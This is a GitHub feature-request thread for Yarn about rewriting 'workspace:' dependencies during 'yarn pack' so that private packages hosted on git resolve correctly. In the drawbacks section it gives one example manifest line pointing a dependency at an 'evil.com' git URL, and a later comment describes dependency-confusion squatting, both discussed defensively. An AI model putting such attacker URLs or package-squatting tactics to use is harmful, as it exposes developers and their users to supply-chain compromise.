yarnpkg / berry

📦🐈 Active development trunk for Yarn ⚒
https://yarnpkg.com
BSD 2-Clause "Simplified" License

[Feature] custom version formatting for packing sibling packages in a workspace #5495

Open appsforartists opened 1 year ago

appsforartists commented 1 year ago

Describe the user story

We don't have an internal npm server; rather, we use a git remote as our private packages host. This leads to dependencies like this:

"package-a": "git+sso://some-host/some-project.git#tag=package-a-v0.1.0-gitpkg",

In this case, some-project is a Yarn-managed monorepo containing packages like package-a and package-b. package-a depends on package-b using the workspace: protocol.

Packages are published by the excellent gitpkg, which runs yarn pack for each package and pushes the result as a git tag.

yarn pack resolves the workspace: protocol to the version in the dependency's package.json. Thus, yarn is currently assuming the packed files will be distributed with an npm server.

When someone installs a package from git and runs yarn, yarn will check if a package with that name exists on npm. If so, it will try to use it. This can yield hard-to-debug errors like:

package-b@npm:0.0.0: No candidates found

where package-b is a transitive dependency that has been packed with the wrong version.
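To make the failure mode concrete, here is a rough model of the rewrite described above. It is a simplified sketch, not Yarn's actual implementation: the function names are hypothetical, and it only covers the `workspace:*`, `workspace:^`, `workspace:~`, and explicit-range forms.

```typescript
// Simplified model of how `yarn pack` replaces `workspace:` ranges.
// Hypothetical helper names; this is not code from Yarn itself.
function resolveWorkspaceRange(range: string, siblingVersion: string): string {
  const prefix = "workspace:";
  if (!range.startsWith(prefix)) return range; // not a workspace dependency
  const selector = range.slice(prefix.length);
  if (selector === "*") return siblingVersion; // workspace:* -> exact version
  if (selector === "^" || selector === "~") return selector + siblingVersion;
  return selector; // e.g. workspace:^1.2.3 -> ^1.2.3
}

function packDependencies(
  dependencies: Record<string, string>,
  siblingVersions: Record<string, string>,
): Record<string, string> {
  const packed: Record<string, string> = {};
  for (const [name, range] of Object.entries(dependencies)) {
    const version = siblingVersions[name];
    // Dependencies that are not workspace siblings are left untouched.
    packed[name] =
      version === undefined ? range : resolveWorkspaceRange(range, version);
  }
  return packed;
}

// package-a's dependency on its sibling becomes a bare version,
// which a consumer will then look up on npm.
const packedExample = packDependencies(
  { "package-b": "workspace:*" },
  { "package-b": "0.0.0" },
);
console.log(packedExample["package-b"]); // 0.0.0
```

Nothing in the packed result records that package-b was meant to come from the same git remote, which is why the consumer ends up asking npm for it.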

Describe the solution you'd like

A field in package.json that can be interpolated by the pack plugin. It might be called protocolFormat.

(There are all sorts of permutations of pack, version, dependency, protocol, remote, and format that might yield a key name. I've avoided bikeshedding on that here.)

package.json
  "version": "0.0.0",
  "protocolFormat": "git+sso://some-host/some-project.git#tag=package-a-v$VERSION-gitpkg",

When pack encounters a manifest with this field, it uses it to replace workspace:. The value will be copied verbatim, with some simple string substitutions:

token          replaced with
$VERSION       package.version
$PACKAGE_NAME  package.name

The most important one is $VERSION. $PACKAGE_NAME is nice because it lets the same protocolFormat be copy/pasted in many packages within a project.
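The substitution could be as small as the sketch below. This is only an illustration of the proposal: `protocolFormat` does not exist in Yarn today, `formatPackedRange` is a hypothetical name, and I'm assuming the field is read from the dependency's own manifest.

```typescript
// Hypothetical sketch of the proposed `protocolFormat` interpolation.
// Neither the field nor this function exists in Yarn today.
interface SiblingManifest {
  name: string;
  version: string;
  protocolFormat?: string;
}

function formatPackedRange(sibling: SiblingManifest): string {
  // Without the field, fall back to writing the plain version
  // (the workspace:* case of the current behavior).
  if (sibling.protocolFormat === undefined) return sibling.version;
  // Replace both tokens in a single pass; unknown text is copied verbatim.
  return sibling.protocolFormat.replace(
    /\$(VERSION|PACKAGE_NAME)/g,
    (_match, token: string) =>
      token === "VERSION" ? sibling.version : sibling.name,
  );
}

const formatted = formatPackedRange({
  name: "package-b",
  version: "0.1.0",
  protocolFormat:
    "git+sso://some-host/some-project.git#tag=$PACKAGE_NAME-v$VERSION-gitpkg",
});
console.log(formatted);
// git+sso://some-host/some-project.git#tag=package-b-v0.1.0-gitpkg
```

Using a replacer callback rather than a replacement string avoids any special handling of `$` sequences in the substituted values.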

Describe the drawbacks of your solution

  1. Uses a key in the package.json namespace.

    Whatever key we pick would have to only be used for this purpose. If another tool in the JS ecosystem picked a similar name for a different feature, the tools would be in conflict.

  2. Is a niche use case in the core codebase

    Since using a git remote as a package repository is not a mainstream practice, one could argue that supporting it is outside the scope of the yarn organization.

    The footprint of this change is small (adding an if condition with a simple string replacement). It is unlikely to need much maintenance in the future.

    The assumption that anyone who uses workspace: expects their packages to be distributed to an npm server is faulty and inconsistent with the rest of the project. If packages were only meant to be published to npm, there wouldn't be a top-level Protocols tab in the docs. This change corrects that assumption.

    Simply, its value outweighs its cost.

  3. Allows the dependency version to be changed via user input

    One can imagine an attack whereby someone adds

    "protocolFormat": "git+https://evil.com/package.git"

    to a package.json, changing how a dependent is packed.

    While supply chain attacks shouldn't be dismissed, the truth is that if someone has enough access to a codebase to change what's in a sibling package's manifest, the codebase has already been totally compromised regardless of this feature.

Describe alternatives you've considered

  1. Do nothing. Force users to use resolutions.

    The resolutions escape hatch is a workaround for this issue.

    There are two problems:

    1. Transitive dependents are responsible for resolutions. package-a can't programmatically do anything to ensure that dependent-project has the correct resolutions field, but will inevitably be blamed when installation fails without one.

    2. It puts version management for private packages in a different place (resolutions) than for public ones (dependencies). It's likely that someone will forget to keep them in sync, letting one contain stale data. It's also a source for confusion.

  2. Support ${ arbitrary js expression } within the format

    Nice because it looks like a template string, but adds too much complexity.

    It's hard to format a JavaScript expression to fit in a JSON string. It also poses too many questions about which values will be in scope and how they will be sandboxed.

  3. Support any key from package.json

    One alternative to ${} would be to disallow any expression, but support any path in a package.json.

    Choosing a syntax could be difficult; anything other than ${} would need to be learned. ${} affords that it supports arbitrary whitespace and expressions, which would likely not be the case here.

    More broadly, it's unclear what keys beyond name and version might be useful. Starting with the valuable keys doesn't preclude us from adding more powerful formatting later, but does avoid yakshaving to include potentially-unneeded details in an already niche feature.

  4. A plugin

    Since pack is a plugin, its functionality could be replaced with a plugin.

    A fork is ugly. People and tools would need to know to use the fork instead of the original.

    A sandwich plugin is also an option - trying to handle workspace before pack does, and then remembering to restore workspace after pack finishes.

    This solution is needlessly complex and fragile. What happens if the process is aborted before the sandwich has cleaned itself up? How do we ensure that the hooks run in the right order?

appsforartists commented 1 year ago

It's come to my attention that scanning for and squatting on private packages in public registries is being publicized as an attack called dependency confusion.

gitpkg+yarn users are particularly vulnerable due to this issue.

Imagine again that some-project depends on package-a and package-b with git URLs, and that package-a depends on package-b via workspace:. If package-b isn't published on NPM, this works today, as the root instance of package-b fulfills package-a's import {} from 'package-b'.

However, at any point, an attacker could discover that package-b is used privately and publish an evil package-b to NPM. All of a sudden, unbeknownst to the private users, the evil clone is being downloaded alongside package-a, because there is no way for the publisher to control how workspace: schemas are resolved by yarn pack.
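Until something like this lands, a publisher could at least audit packed manifests for private names that ended up as registry ranges. The sketch below is a heuristic under stated assumptions: `findRegistryResolved` is a hypothetical helper, and it treats any range with no explicit protocol (or an explicit `npm:` one) as something Yarn would fetch from the registry, which ignores shorthand forms such as `user/repo`.

```typescript
// Hypothetical audit helper: lists private packages whose packed range
// would be looked up on the npm registry rather than the git remote.
function findRegistryResolved(
  dependencies: Record<string, string>,
  privateNames: ReadonlySet<string>,
): string[] {
  // Matches a leading protocol such as `git+sso:`, `workspace:` or `npm:`.
  const hasProtocol = /^[a-z][a-z0-9+.-]*:/i;
  return Object.entries(dependencies)
    .filter(
      ([name, range]) =>
        privateNames.has(name) &&
        (!hasProtocol.test(range) || range.startsWith("npm:")),
    )
    .map(([name]) => name);
}

const atRisk = findRegistryResolved(
  {
    "package-b": "0.0.0", // packed from workspace:*
    "package-c": "git+sso://some-host/some-project.git#tag=package-c-v0.1.0-gitpkg",
    lodash: "^4.17.21", // public, so not reported
  },
  new Set(["package-b", "package-c"]),
);
console.log(atRisk); // only package-b is reported
```

Here package-c and its tag are made up for illustration; the point is that package-b is the only private name an attacker could shadow on npm.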

Would you accept a PR implementing protocolFormat (as described above) to resolve this?

arcanis commented 1 year ago

the evil clone is being downloaded alongside package-a

Why? If package-a uses workspace:, then Yarn will use whatever the project provides, and not download it from anywhere.

appsforartists commented 1 year ago

If package-a has workspace: in its package.json, yarn pack will resolve that to a specific version number and mint that number into the tarball.

Therefore:

The proposed resolution (teaching yarn pack how to write the correct version schema for private dependencies) ensures that the public package is never incorporated, even if the containing project doesn't set resolutions.